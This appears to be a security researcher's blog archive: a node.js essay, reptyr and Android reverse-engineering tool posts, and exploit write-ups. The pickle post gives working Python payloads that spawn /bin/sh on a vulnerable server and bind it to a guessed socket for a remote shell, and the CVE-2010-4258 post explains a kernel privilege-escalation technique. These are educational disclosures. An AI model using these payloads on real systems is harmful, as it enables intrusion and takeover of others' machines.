Why node.js is cool (it’s not about performance)

For the past N months, it seems like there is no new technology stack that is either hotter or more controversial than node.js. node.js is cancer! node.js cures cancer! node.js is bad ass rock star tech! I myself have given node.js a lot of shit, often involving the phrase “explicit continuation-passing style.”

Most of the arguments I’ve seen seem to center around whether node.js is “scalable” or high-performance, and the relative merits of single-threaded event loops versus threading for scaling out, or other such noise. Or how to best write a Fibonacci server in node.js (wat?).

I am going to completely ignore all of that (and I think you should, too!), and argue that node.js is in fact on to something really cool, and is worth using and thinking about, but for a reason that has absolutely nothing to do with scalability or performance.

The Problem

node.js is cool because it solves a problem shared by virtually every mainstream language. That problem is the fact that, as long as “ordinary” blocking code is the default, it is difficult and unnatural to write networked code in a way that it can be combined with other network code, while allowing them to interact.

In most languages/environments — virtually every other language people use today — when you write networked code, you can either make it fully blocking itself, and implement your own main loop — which is almost always easiest — or you can pick your favorite event loop library (you probably have half a dozen choices), and write your code around that. If you do the latter, not only will your code likely be more awkward than if you chose the blocking main loop approach, but your only reward for the effort is that your code is combinable with the small fraction of other code that also chose the same event loop library.

The upshot of this situation is that if you pick a couple of random networked libraries written by different people (say, an HTTP server, a Twitter client, and an IRC client) and want to combine them (maybe you want a Twitter <-> IRC bridge with a web-based admin panel), you will end up at best having to write some awkward glue code, and at worst doing something truly hackish in order to make them communicate at all.

(In case you’re not convinced about the existence or scope of this problem, you can detour ahead to the optional example of how this problem manifests with typical Python libraries)

Enter node.js

node.js solves this problem, somewhat paradoxically by reducing the number of options available to developers. By having a built-in event loop, and by making that event loop the default way to accomplish virtually anything at all (e.g. all of the builtin IO functions work asynchronously on the same event loop), node.js provides a very strong pressure to write networked code in a certain way. The upshot of this pressure is that, since essentially every node.js library works this way, you can pick and choose arbitrary node.js libraries and combine them in the same program, without even having to think about the fact that you’re doing so.

node.js is cool, then, not for any performance or scalability reasons, but because it makes composable networked components the default.

Concluding Notes

An interesting point here is that there are not really any fundamental differences between what you can do in Python and what you can do in node.js. The Twisted project, for example, is basically an attempt to implement the node.js ideology in Python (yes, I’m being terribly anachronistic describing it that way). Twisted, however, has a fairly steep learning curve, and “feels” unnatural to developers used to writing “normal” Python, and so relatively few libraries get written for the Twisted environment, compared to the rest of the Python ecosystem. Twisted suffers from the fact that the Python language and Python community are not set up to make Twisted the default way to do things.

The key is that node.js makes it, both technically and socially, easier to write code in this composable way than not to do so. The built-in event loop and nonblocking primitives make it technically easy, and the social culture that has grown up around it discourages libraries that don’t work this way, so libraries that attempt to just block for IO are looked down on and are unlikely to thrive and gain adoption and development resources.

I’m also not ignoring the downside of the node.js style — the potentially convoluted callback-based style, the risk of bringing the whole world to a halt with an accidental blocking call, the single-threaded model that makes it hard to effectively exploit multiple cores. node.js definitely makes you do more work than you might otherwise have to, in many circumstances. But the key is, in exchange for this work, you get something really cool — and something much more valuable, in my opinion, than nebulous performance gains.

I also don’t want to claim that node.js is the only system, or the only technical approach, that makes this property possible. But node.js is the most successful such system I know of, and that’s worth at least as much as the technical possibility — what’s the use of being able to combine third-party libraries, if no one has written anything worth using in the first place?

And similarly, while the single-threaded callback model may not be the best possible model, it seems to have hit a sweet spot in terms of what developers are willing to put up with. Certainly, people are writing node.js code like mad; check out the npm registry for a partial list.

So, node.js is not magic, and it definitely doesn’t cure cancer. But there is something here worth looking at. The next time you need to glue some unrelated networked services together, give node.js a shot – I think you’ll like it. And if you’re still not convinced, glue a quick HTTP frontend onto whatever you’ve created. I promise you’ll be shocked by how easy it is.

Postscript – A Python Example

As an optional addendum, here’s a step-by-step discussion of just how bad the situation is in most other languages.

Let’s imagine we want to write a trivial Jabber -> IRC bridge: A bot that lurks in an IRC channel, and signs on to Jabber, and sends all the messages it receives on Jabber into the IRC channel. This is the kind of simple problem that can be described in one sentence, and sounds like it should take all of 20 lines of code, but actually turns out to be rather a nuisance.

Python has, by this point, a great library ecosystem, so we happily start googling, and find the plausible looking python-irclib and xmpppy libraries. Great. So, what does code in each of those look like? Well, in python-irclib, we construct a subclass of SingleServerIRCBot, and call the start function, which runs the IRC main loop:

bot = MyBot(channel, nickname, server, port)
bot.start()

And in xmpppy, we construct an xmpp.Client object, and call Client.Process in a loop, with a timeout:

conn = xmpp.Client(server)
# connect to the server
while True:
  conn.Process(1)

Ok, so, we launch a thread for each one, and a few minutes of fumbling later, we’re connected to both Jabber and IRC. So far, so good. We’re using Python’s threads, which will inevitably bring us a world of pain, but I’ll ignore that for now, since a better threading implementation could fix most of the pain.

But now, what do we do when we receive a Jabber message? We want to send a message out the python-irclib instance, but how do we do that? python-irclib isn’t thread safe, so we can’t just call .send() from the Jabber thread. Ok, so we add in a Queue.Queue, and have the Jabber thread push messages onto it.

Now we just need to make the IRC thread fetch messages from this queue. But how do we do that? The IRC thread is blocked somewhere deep inside python-irclib, waiting for network traffic. How do we wake it up to read messages from the queue? The easiest way is to switch from calling start to calling process_once in a loop with a short timeout.

This will work, and we’ll eventually get something working, but now we’re forced into polling, with all the annoying latency/CPU tradeoffs that entails, and also half of our code so far has just been spent gluing these two libraries together.
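To make the shape of that glue concrete, here is a minimal sketch in Python 3 syntax (the snippets above are Python 2). FakeIrcClient is a hypothetical stand-in, not python-irclib's API; only the name process_once is borrowed from the discussion above. The point is the polling loop: every pass through it costs either latency (long timeout) or CPU (short timeout).

```python
import queue
import threading
import time


class FakeIrcClient:
    """Hypothetical stand-in for an IRC library (not python-irclib's API)."""

    def __init__(self):
        self.sent = []

    def process_once(self, timeout):
        # A real library would wait on its socket for up to `timeout` seconds.
        time.sleep(timeout)

    def send(self, text):
        self.sent.append(text)


def irc_loop(irc, outbox, stop, poll_interval=0.01):
    """Alternate between servicing IRC and draining the cross-thread queue."""
    while not stop.is_set():
        irc.process_once(poll_interval)
        while True:
            try:
                irc.send(outbox.get_nowait())
            except queue.Empty:
                break


def run_bridge(messages):
    """Push messages from a pretend Jabber thread to the IRC thread."""
    outbox = queue.Queue()
    stop = threading.Event()
    irc = FakeIrcClient()
    worker = threading.Thread(target=irc_loop, args=(irc, outbox, stop), daemon=True)
    worker.start()
    for text in messages:  # this loop plays the role of the Jabber thread
        outbox.put(text)
    deadline = time.monotonic() + 2.0
    while len(irc.sent) < len(messages) and time.monotonic() < deadline:
        time.sleep(0.01)
    stop.set()
    worker.join()
    return irc.sent
```

Nearly all of this is plumbing: the queue, the stop flag, and the poll interval exist only because the two libraries cannot share a main loop.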

In node.js, on the other hand, we’d just instantiate client objects for both protocols, set up some event handlers, and … well, that’s about it. Because everything’s hooked into the same main loop, they’ll Just Work together, and because we’re all running single-threaded, we can mostly just communicate directly between the two libraries without having to think too hard about race conditions or anything.
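For contrast, the shared-loop shape looks roughly like the following. To keep all the examples in one language this is sketched with Python's asyncio rather than node.js itself, and both client classes are hypothetical stand-ins rather than real libraries. The structure is the part that matters: one loop, two clients, and an event handler connecting them directly.

```python
import asyncio


class FakeJabberClient:
    """Hypothetical event-emitting client (not a real XMPP library)."""

    def __init__(self):
        self.handlers = []

    def on_message(self, handler):
        self.handlers.append(handler)

    async def run(self, incoming):
        for text in incoming:
            await asyncio.sleep(0)  # yield to the loop, as network IO would
            for handler in self.handlers:
                handler(text)


class FakeIrcClient:
    """Hypothetical IRC client that records what it was asked to say."""

    def __init__(self):
        self.sent = []

    def say(self, text):
        self.sent.append(text)


async def bridge(incoming):
    jabber = FakeJabberClient()
    irc = FakeIrcClient()
    # Both clients live on the same loop and thread, so the handler can
    # call straight into the other library without locks or queues.
    jabber.on_message(irc.say)
    await jabber.run(incoming)
    return irc.sent


def run_bridge(incoming):
    return asyncio.run(bridge(incoming))
```

There is no queue, no second thread, and no polling interval to tune; the glue shrinks to the single on_message line.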

The point, of course, is not that it is impossible to write this program in Python. It is possible, and I’ve done it, and it’s not that terrible. But any option you take will involve some annoying tradeoffs, and will involve making lots of irrelevant plumbing decisions about how to make your pieces play well together. And compared to all that, node.js feels like a breeze.

BlackHat/DEFCON 2011 talk: Breaking out of KVM

I’ve posted the final slides from my talk this year at DEFCON and Black Hat, on breaking out of KVM, the Kernel-based Virtual Machine, on Linux.

[Edited 2011-08-11] The code is now available. It should be fairly well-commented, and include links to everything you’ll need to get the exploit up and running in a local test environment, if you’re so inclined.

In addition, as I mentioned, this bug was found by a simple KVM fuzzer I wrote. I’m also going to clean that up and release it, but don’t expect it too soon.

I had a great time meeting lots of interesting people at BlackHat and DEFCON, some that I’d met online and others I hadn’t. If any of you are ever in Boston, drop me a note and we can grab a beer or something.

Aug 8th, 2011

Exploiting misuse of Python’s “pickle”

If you program in Python, you’re probably familiar with the pickle serialization library, which provides for efficient binary serialization and loading of Python datatypes. Hopefully, you’re also familiar with the warning printed prominently near the start of pickle‘s documentation:

Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Recently, however, I stumbled upon a project that was accepting and unpacking untrusted pickles over the network, and a poll of some friends revealed that few of them were aware of just how easy it is to exploit a service that does this. As such, this blog post will describe exactly how trivial it is to exploit such a service, using a simplified version of the code I recently encountered as an example. Nothing in here is novel, but it’s interesting if you haven’t seen it.

The Target

The vulnerable code was a Twisted server that listened over SSL. The code looked roughly like the following:

class VulnerableProtocol(protocol.Protocol):
  def dataReceived(self, data):
 
     # Code to actually parse incoming data according to an
     #  internal state machine
     # If we just finished receiving headers, call verifyAuth() to
     #  check authentication
 
  def verifyAuth(self, headers):
    try:
      token = cPickle.loads(base64.b64decode(headers['AuthToken']))
      if not check_hmac(token['signature'], token['data'], getSecretKey()):
        raise AuthenticationFailed
      self.secure_data = token['data']
    except:
      raise AuthenticationFailed

So, if we just send a request that looks something like:

AuthToken: <pickle here>

The server will happily unpickle it.

Executing Code

So, what can we do with that? Well, pickle is supposed to allow us to represent arbitrary objects. An obvious target is Python’s subprocess.Popen objects: if we can trick the target into instantiating one of those, they’ll be executing arbitrary commands for us! To generate such a pickle, however, we can’t just create a Popen object and pickle it; for various mostly-obvious reasons, that won’t work. We could read up on the pickle format and construct a stream by hand, but it turns out there is no need to.

pickle allows arbitrary objects to declare how they should be pickled by defining a __reduce__ method, which should return either a string or a tuple describing how to reconstruct this object on unpacking. In the simplest form, that tuple should just contain

  • A callable (which must be either a class, or satisfy some other, odder, constraints), and
  • A tuple of arguments to call that callable on.

pickle will pickle each of these pieces separately, and then on unpickling, will call the callable on the provided arguments to construct the new object.
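To see the mechanism in isolation, here is a harmless sketch in Python 3 syntax (the post's own snippets are Python 2). The class name Replay is made up for illustration, and the builtin sorted stands in for whatever callable an attacker would actually pick.

```python
import pickle


class Replay(object):
    """Illustrative class: its pickle says 'call sorted([3, 1, 2])'."""

    def __reduce__(self):
        # (callable, argument tuple), exactly the two pieces listed above.
        return (sorted, ([3, 1, 2],))


payload = pickle.dumps(Replay())

# Unpickling never reconstructs a Replay at all. It looks up the callable
# named in the stream and calls it with the stored arguments.
result = pickle.loads(payload)
```

Here result is whatever sorted returned, a plain list, which shows that the unpickling side runs a call chosen by whoever produced the bytes.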

And so, we can construct a pickle that, when un-pickled, will execute /bin/sh, as follows:

import cPickle
import subprocess
import base64
 
class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh',),))
 
print base64.b64encode(cPickle.dumps(RunBinSh()))

Getting a Remote Shell

At this point, we’ve basically won. We can run arbitrary shell commands on the target, and there are any number of ways we could bootstrap from here up to an interactive shell and whatever else we might want.

For completeness, I’ll explain what I did, since it’s a moderately cute trick. subprocess.Popen lets us select which file descriptors to attach to stdin, stdout, and stderr for the new process by passing integers for the stdin and similarly-named arguments, so we can open our /bin/sh on arbitrarily-numbered fd’s.

However, as mentioned above, the target server uses Twisted, and it serves all requests in the same thread, using an asynchronous event-driven model. This means we can’t necessarily predict which file descriptor on the server will correspond to our socket, since it depends on how many other clients are connected.

It also means, however, that every time we connect to the server, we’ll open a new socket inside the same server process. So, let’s guess that the server has fewer than, say, 20 concurrent connections at the moment. If we connect to the server’s socket 20 times, that will open 20 new file descriptors in the server. Since they’ll get assigned sequentially, one of them will almost certainly be fd 20. Then, we can generate a pickle like so, and send it over:

import cPickle
import subprocess
import base64
 
class Exploit(object):
  def __reduce__(self):
    fd = 20
    return (subprocess.Popen,
            (('/bin/sh',), # args
             0,            # bufsize
             None,         # executable
             fd, fd, fd    # std{in,out,err}
             ))
 
print base64.b64encode(cPickle.dumps(Exploit()))

We’ll open a /bin/sh on fd 20, which should be one of our 20 connections, and if all goes well, we’ll see a prompt printed to one of those. We’ll send some junk on that fd until we manage to get the original server to error out and close the connection, and we’ll be left talking to /bin/sh over a socket. Game over.
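The guess about fd numbers leans on a POSIX guarantee: a newly allocated descriptor gets the lowest number not currently in use. A small local sketch of that behavior follows, using os.dup on a pipe as a stand-in for the server accepting connections; the helper names are made up for illustration.

```python
import os


def open_many(count):
    """Allocate `count` new descriptors and return their numbers in order."""
    read_end, write_end = os.pipe()
    try:
        return [os.dup(read_end) for _ in range(count)]
    finally:
        os.close(read_end)
        os.close(write_end)


def close_all(fds):
    for fd in fds:
        os.close(fd)
```

As long as nothing else in the process closes a descriptor in the meantime, each new number is higher than the one before it, which is why a burst of 20 connections sweeps across a predictable range of fds in the server.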

In Conclusion

Again, nothing here should be novel, nor would I expect any of these pieces to take a competent hacker more than a few minutes to figure out, given the problem. But if this blog post teaches someone not to use pickle on untrusted data, then it will be worth it.
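For what it's worth, the vulnerable server already had an HMAC check; it just ran after the unpickle. One possible shape for doing it the other way around is sketched below, in Python 3 syntax: authenticate the raw bytes first, and only then parse them, using a data-only format (JSON here) instead of pickle. The function names and token layout are assumptions for illustration, not the original project's code.

```python
import base64
import hashlib
import hmac
import json

SIG_LEN = hashlib.sha256().digest_size  # 32 bytes


def make_token(data, key):
    """Serialize `data` as JSON and prepend an HMAC-SHA256 over the bytes."""
    body = json.dumps(data, sort_keys=True).encode("utf-8")
    sig = hmac.new(key, body, hashlib.sha256).digest()
    return base64.b64encode(sig + body)


def verify_token(token, key):
    """Check the signature over the raw bytes, then (and only then) parse."""
    raw = base64.b64decode(token)
    sig, body = raw[:SIG_LEN], raw[SIG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("bad signature")
    return json.loads(body.decode("utf-8"))
```

With this ordering, bytes from an unauthenticated sender never reach a parser that can be talked into calling things.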

Mar 20th, 2011

reptyr: Changing a process’s controlling terminal

reptyr (announced recently on this blog) takes a process that is currently running in one terminal, and transplants it to a new terminal. reptyr comes from a proud family of similar hacks, and works in the same basic way: We use ptrace(2) to attach to a target process and force it to execute code of our own choosing, in order to open the new terminal, and dup2(2) it over stdout and stderr.

The main special feature of reptyr is that it actually changes the controlling terminal of the target process. The “controlling terminal” is a concept maintained by UNIX operating systems that is independent of a process’s file descriptors. The controlling terminal governs details like where ^C gets delivered, and how applications are notified of changes in window size.

Processes are grouped into two levels of hierarchical groups: sessions, and process groups. Each group is named by an ID, which is the PID of the initial leader (either “session leader” or “process group leader”). Even if the leader exits, that number is still the ID for the group. Sessions are used for terminal management — Every process in a session has the same controlling terminal, and each terminal belongs to at most one session. Process groups are a sub-division within sessions, and are used primarily for job control within the shell. For a more in-depth explanation, see part 3 of my earlier series on termios.

If you check out tty_ioctl(4), you’ll find that Linux has an ioctl, TIOCSCTTY, that can be used to set the controlling terminal of a process, and you could be forgiven for thinking that all we need is to make the target call that ioctl, and we’re done.

However, if we read closer, we find that it has several restrictions. In particular:

The calling process must be a session leader and not have a controlling terminal already. If this terminal is already the controlling terminal of a different session group then the ioctl fails with EPERM […]

In the typical case, where you’re trying to attach a (say) mutt that you spawned from your shell, mutt won’t be a session leader: your shell will be the session leader, and mutt will be the process group leader for a process group containing only itself.

So, we need to make the target a session leader. Conveniently, there’s a system call for that: setsid(2).

However, reading that man page, we find a new caveat: setsid(2) fails with EPERM if

The process group ID of any process equals the PID of the calling process. Thus, in particular, setsid() fails if the calling process is already a process group leader.

The shell creates a new process group for every job you launch, and so our target mutt will be a process group leader, and unable to setsid(). The usual solution for programs that want to setsid is to fork(), so that the child is still in the parent’s session and process group, and then setsid() in the child. However, fork()ing our mutt and killing off the parent seems potentially disruptive, so let’s see if we can avoid that.

So, we’re going to need to change mutt‘s process group ID, so that there are no processes with process group IDs equal to its PID. Following some trusty SEE ALSO links, we get to setpgid(2). There’s a bunch of text in that man page, but the key bit is:

If setpgid() is used to move a process from one process group to another, both process groups must be part of the same session (see setsid(2) and credentials(7)). In this case, the pgid specifies an existing process group to be joined and the session ID of that group must match the session ID of the joining process.

We need to find a process group in the same session as mutt to move our mutt into, and then we’ll be able to setsid. We could try to find one — the shell is a plausible candidate, for instance — but there’s an alternate, more direct route: Create one.

While we have mutt captured with ptrace, we can make it fork(2) a dummy child, and start tracing that child, too. We’ll make the child setpgid to make it into its own process group, and then get mutt to setpgid itself into the child’s process group. mutt can then setsid, moving into a new session, and now that it is a session leader, we can finally make it ioctl(TIOCSCTTY) on the new terminal, and we win.
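The same sequence of calls can be tried out without ptrace. The sketch below is an illustration in Python, not reptyr's code: it runs the steps in a throwaway forked process instead of injecting them into a traced target, it has the parent call setpgid on the dummy child's behalf, and it stops before the TIOCSCTTY step. All function names are made up.

```python
import os


def become_session_leader_via_dummy_child():
    """Call from a process group leader; returns True once setsid() worked."""
    gate_r, gate_w = os.pipe()
    child = os.fork()
    if child == 0:
        # Dummy child: block until the parent closes its end of the pipe.
        os.close(gate_w)
        os.read(gate_r, 1)
        os._exit(0)
    os.close(gate_r)
    os.setpgid(child, child)  # the dummy gets a process group of its own
    os.setpgid(0, child)      # we join it, leaving our old group empty
    os.setsid()               # allowed now: no group is named by our PID
    os.close(gate_w)          # release the dummy
    os.waitpid(child, 0)
    return os.getsid(0) == os.getpid()


def demo():
    """Run the experiment in a forked sandbox; returns e.g. 'EPERM,ok'."""
    out_r, out_w = os.pipe()
    pid = os.fork()
    if pid == 0:
        os.close(out_r)
        result = b"error"
        try:
            os.setpgid(0, 0)  # mimic a shell job: lead our own group
            try:
                os.setsid()
                direct = b"ok"
            except PermissionError:
                direct = b"EPERM"
            ok = become_session_leader_via_dummy_child()
            result = direct + b"," + (b"ok" if ok else b"fail")
        except BaseException:
            pass
        os.write(out_w, result)
        os._exit(0)
    os.close(out_w)
    data = os.read(out_r, 64)
    os.close(out_r)
    os.waitpid(pid, 0)
    return data.decode()
```

The first field of the result is the direct setsid() attempt made while still a process group leader, and the second is the attempt made after hopping into the dummy child's group.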

It turns out I didn’t invent this technique — injcode and neercs work the same way. But I did discover it independently of them, and it was a fun little hunt through unix arcana.

Feb 8th, 2011

reptyr: Attach a running process to a new terminal

Over the last week, I’ve written a nifty tool that I call reptyr. reptyr is a utility for taking an existing running program and attaching it to a new terminal. Started a long-running process over ssh, but have to leave and don’t want to interrupt it? Just start a screen, use reptyr to grab it, and then kill the ssh session and head on home.

You can grab the source, or read on for some more details.

There’s a shell script called screenify that’s been going around the internet for nigh on 10 years now that is supposed to use gdb to accomplish the same thing. There’s also a project called retty that tries to do the same thing, in C using ptrace() directly.

The difference between those programs and reptyr is that reptyr works much, much, better.

If you attach a less using screenify or retty, it will still take input from the old terminal. If you attach an ncurses program, and resize the window, the program probably won’t resize correctly. ^C and ^Z will still be processed on the old terminal — typing them in the new terminal won’t do anything useful.

reptyr fixes all of these problems and more, and is the only such tool I know of that does so. I’ve never seen a program that doesn’t behave noticeably incorrectly after attaching with retty or screenify, whereas with reptyr most programs I have tried work flawlessly.

How does it work?

reptyr works in the same basic way as screenify and retty — it attaches to the target process using the ptrace API, opens the new terminal, and dup2s it over the old file descriptors. It also copies the termios settings from the old terminal to the new terminal.

The main thing that reptyr does that no one else does is that it actually changes the controlling terminal of the process you are attaching. This is the detail that makes many things Just Work, including ^C and ^Z and window resizing.

Switching the target’s controlling terminal is not easy and involves a fair bit of trickery with ptrace and Linux’s terminal APIs. I will probably do another blog post some time about the dirty details of how I make this work, but for now you can check out attach.c if you really want to know.

reptyr still has a number of limitations — it doesn’t generally work, for example, if the target process has any children. I know how to fix most of these problems, though, so expect it to get better with time. Please let me know if you find it useful!

Appendix

(Edited to add:) Nothing is really new. A commenter on reddit pointed out that injcode and neercs both accomplish the same thing, even using the same trick to change the CTTY. Ah well, I had fun writing it anyway, and apparently I wasn’t the only one who didn’t know about the existing alternatives. neercs is a full screen replacement, though, and I think that reptyr should be more robust than injcode (I use a different technique for ptrace-hijacking, for example), and so hopefully this tool still has a niche as a more robust standalone utility. Certainly, judging from the amount of enthusiasm I’ve seen for this tool, this still isn’t a problem that is solved to the average user’s satisfaction.

Jan 21st, 2011

Some Android reverse-engineering tools

I’ve spent a lot of time this last week staring at decompiled Dalvik assembly. In the process, I created a couple of useful tools that I figure are worth sharing.

I’ve been using dedexer instead of baksmali, honestly mainly because the former’s output has fewer blank lines and so is more readable on my netbook’s screen. Thus, these tools are designed to work with the output of dedexer, but the formats are simple enough that they should be easily portable to smali, if that’s your tool of choice (And it does look like a better tool overall, from what I can see).

ddx.el

I’m an emacs junkie, and I can’t stand it when I have to work with a file that doesn’t have an emacs mode. So, a day into staring at un-highlighted .ddx files in fundamental-mode, I broke down and threw together ddx-mode. It’s fairly minimal, but it provides functional syntax highlighting, and a little support for navigating between labels. One cute feature I threw in is that, if you move the point over a label, any other instances of that label get highlighted, which I found useful in keeping track of all the “lXXXXX” labels dedexer generates.

An example file (from k9mail) highlighted using ddx-mode

ddx2dot

Dalvik assembly is, on the whole, pretty easy to read, but occasionally you stumble on huge methods that clearly originated from multiple nested loops and some horrible chained if statements. And what you’d really like is to be able to see the structure of the code, as much as the details of the instructions.

To that end, I threw together a Python script that “parses” .ddx files, and renders them to a control-flow graph using dot. As an example, the parseToken method from the IMAP parser in the k9mail application for Android looks like the following, when disassembled and rendered to a CFG:

A CFG for k9mail's ImapResponseParser.parseToken method

I use the term “parses” because it’s really just a pile of regexes, line.split() and line.startswith("..."), but it gets the job done, so I hope it might be of use to someone else. The biggest missing feature is that it doesn’t parse catch directives, so those just end up floating out to the side as unattached blocks.
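To give a flavor of the approach, here is a toy version of the same idea. It is not the ddx2dot source, and the input syntax (labels ending in a colon, goto, if-* with the target as the last operand, return*) is a simplified assumption rather than dedexer's exact output format.

```python
def build_cfg(lines):
    """Split instructions into basic blocks and collect the edges between them."""
    blocks = {"entry": []}
    edges = []
    current = "entry"
    ended = False          # did the last instruction end the current block?
    falls_through = True   # can control flow from `current` into the next line?
    anon = 0

    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        is_label = line.endswith(":")
        if is_label or ended:
            # Start a new block, named by the label or a generated name.
            if is_label:
                name = line[:-1]
            else:
                anon += 1
                name = "anon%d" % anon
            if falls_through:
                edges.append((current, name))
            blocks.setdefault(name, [])
            current, ended, falls_through = name, False, True
            if is_label:
                continue
        blocks[current].append(line)
        op = line.split()[0]
        if op == "goto":
            edges.append((current, line.split()[1]))
            ended, falls_through = True, False
        elif op.startswith("if-"):
            edges.append((current, line.rsplit(",", 1)[1].strip()))
            ended, falls_through = True, True
        elif op.startswith("return"):
            ended, falls_through = True, False
    return blocks, edges


def to_dot(blocks, edges):
    """Render the graph in dot syntax, one box per basic block."""
    out = ["digraph cfg {"]
    for name, body in blocks.items():
        label = "\\l".join([name + ":"] + body) + "\\l"
        out.append('  "%s" [shape=box, label="%s"];' % (name, label))
    for src, dst in edges:
        out.append('  "%s" -> "%s";' % (src, dst))
    out.append("}")
    return "\n".join(out)
```

Feeding the output of to_dot to the dot tool gives a picture much like the one above, minus everything a real parser would have to handle, such as catch directives, switch tables, and instructions containing quote characters.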

You’ll also notice the rounded “return” blocks — either javac or dx merges all exits from a function to go through the same return block, but I found that preserving that feature in the CFG produces a lot of clutter and makes it hard to read, so I lift every edge that would go to that common block to go to a separate block.

Github

Both tools live in my “reverse-android” repository on github, and are released under the MIT license. Please feel free to do whatever you want with them, although I’d appreciate it if you let me know if you make any improvements or find them useful.

CVE-2010-4258: Turning denial-of-service into privilege escalation

Dan Rosenberg recently released a privilege escalation exploit for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I’m going to do a brief tour of the various kernel features that collided to make this bug possible, and explain how they combine to turn an otherwise-boring oops into privilege escalation.

access_ok

When a user application passes a pointer to the kernel, and the kernel wants to read or write from that pointer, the kernel needs to perform various checks that a buggy or malicious userspace app hasn’t passed an “evil” pointer.

Because the kernel and userspace run in the same address space, the most important check is simply that the pointer points into the “userspace” part of the address space. User applications are protected by page table permissions from writing into kernel memory, but the kernel isn’t, and so must explicitly check that any pointers given to it by a user don’t point into the kernel region.

The address space is laid out such that user applications get the bottom portion, and the kernel gets the top, so this check is a simple comparison against that boundary. The kernel function that performs this check is called access_ok, although there are various other functions that do the same check, implicitly or otherwise.

get_fs() and set_fs()

Occasionally, however, the kernel finds it useful to change the rules for what access_ok will allow. set_fs() [1] is an internal Linux function that is used to override the definition of the user/kernel split, for the current process.

After a set_fs(KERNEL_DS), no checking is performed that user pointers point to userspace — access_ok will always return true. set_fs(KERNEL_DS) is mainly used to enable the kernel to wrap functions that expect user pointers, by passing them pointers into the kernel address space. A typical use reads something like this:

old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &pos);
set_fs(old_fs);

vfs_readv expects a user-provided pointer, so without the set_fs(), the access_ok() inside vfs_readv() would fail on our kernel buffer. We use set_fs() to temporarily disable that checking.

Kernel oopses

When the kernel oopses, perhaps because of a NULL pointer dereference in kernelspace, or because of a call to the BUG() macro to indicate an assertion failure, the kernel attempts to clean up, and then kills the current process by calling the do_exit() function.

When the kernel does so, it’s still running in the same process context it was in before the oops occurred, including any set_fs() override, if applicable. This means that do_exit will get called with access_ok disabled, which is not something anyone expected when they wrote the individual pieces of this system.

clear_child_tid

As it turns out, do_exit contains a write to a user-controlled address that expects access_ok to be working properly!

clear_child_tid is a feature where, on thread exit, the kernel can be made to write a zero into a specified address in that thread’s address space, in order to notify other threads of that exit.

This is implemented by simply storing a pointer to the to-be-zeroed address inside struct task_struct (which represents a single thread or process), and, on exit, mm_release, called from do_exit, does:

put_user(0, tsk->clear_child_tid);

This is normally safe, because put_user checks that its second argument falls into the “userspace” segment before doing a write. But, if we are running with get_fs() == KERNEL_DS, it will happily accept any address at all, even one pointing into kernel space.

So, if we find any kernel BUG() or NULL dereference, or other page fault, that we can trigger after a set_fs(KERNEL_DS), we can trick the kernel into a user-controlled write into kernel memory!
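The interaction is easier to see in a toy model. The sketch below is plain Python, not kernel code: the function names mirror the kernel's, but the address limit values, the dictionary standing in for memory, and the exception standing in for an oops are all simplifying assumptions.

```python
USER_DS = 0x00007FFFFFFFF000   # illustrative user/kernel boundary
KERNEL_DS = 1 << 64            # "no limit": every 64-bit address passes


class KernelOops(Exception):
    """Stands in for a NULL dereference or BUG() inside the kernel."""


class Task(object):
    def __init__(self, clear_child_tid):
        self.addr_limit = USER_DS
        self.clear_child_tid = clear_child_tid  # user-chosen address


def access_ok(task, addr):
    return addr < task.addr_limit


def put_user(task, memory, value, addr):
    if not access_ok(task, addr):
        return False  # the real kernel would return -EFAULT
    memory[addr] = value
    return True


def do_exit(task, memory):
    if task.clear_child_tid:
        put_user(task, memory, 0, task.clear_child_tid)


def run_under_kernel_ds(task, memory, operation):
    """Model of the get_fs()/set_fs() wrapper around a handler."""
    old_limit = task.addr_limit
    task.addr_limit = KERNEL_DS
    try:
        operation()
    except KernelOops:
        # The oops path kills the task with the override still in place.
        do_exit(task, memory)
        return False
    task.addr_limit = old_limit
    return True


def buggy_handler():
    raise KernelOops("NULL pointer dereference")
```

An ordinary do_exit on a task whose clear_child_tid points at a kernel address leaves that address alone, but the same exit reached through buggy_handler under run_under_kernel_ds zeroes it.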

splice() et al.

An obvious question at this point is: How much of the kernel can an attacker cause to run with get_fs() == KERNEL_DS?

There are a number of small special cases. For example, the binary sysctl compatibility code works by calling the normal /proc/ write handlers from kernelspace, under set_fs(). A handful of compat-mode (32 on 64) syscalls work similarly.

By far the biggest source I’ve found, however, is the splice() system call. The splice() system call is a relatively recent addition to Linux, and allows for zero-copy transfer of pages between a pipe and another file descriptor.

As of 2.6.31, attempts to splice() to or from an fd that doesn’t support special handling to actually do zero-copy splice, will fall back on doing an ordinary read(), write(), or sendmsg() on the fd … from the kernel, using set_fs() in order to pass in kernel buffers.

What that means is that by using splice(), an attacker can call the bulk of the code in most obscure filesystems and socket types (which tend not to have explicit splice() support) with a segment override in place. Conveniently for an attacker, that is also exactly a description of where the bulk of the random security bugs tend to be.

This is also exactly the technique Dan’s exploit uses. He uses CVE-2010-3849, an otherwise boring NULL pointer dereference I reported in the Econet network protocol. His exploit code does a splice() to an econet socket, causing the econet_sendmsg handler to get called under set_fs(KERNEL_DS). When it oopses, do_exit is called, and he gets a user-controlled write into kernel memory. Everything else is just details.

Footnotes:

1 Back in Linux 1.x, this function actually set the %fs register on i386. It hasn’t in years, but it’s used in too many places for changing the name to be worth it.

Dec 10th, 2010

Some notes on CVE-2010-3081 exploitability

Most of you reading this blog probably remember CVE-2010-3081. The bug got an awful lot of publicity when it was discovered and announced, due to allowing local privilege escalation against virtually all 64-bit Linux kernels in common use at the time.

While investigating CVE-2010-3081, I discovered that several of the commonly-believed facts about the CVE were wrong, and it was even more broadly exploitable than was publicly documented. I’d like to share those observations here.

A brief review of the bug

The bug arose from the compat_alloc_user_space function in Linux’s 32-bit compatibility support on 64-bit systems. compat_alloc_user_space allocates and returns space on the userspace stack for the kernel to use:

static inline void __user *compat_alloc_user_space(long len)
{
    struct pt_regs *regs = task_pt_regs(current);
    return (void __user *)regs->sp - len;
}

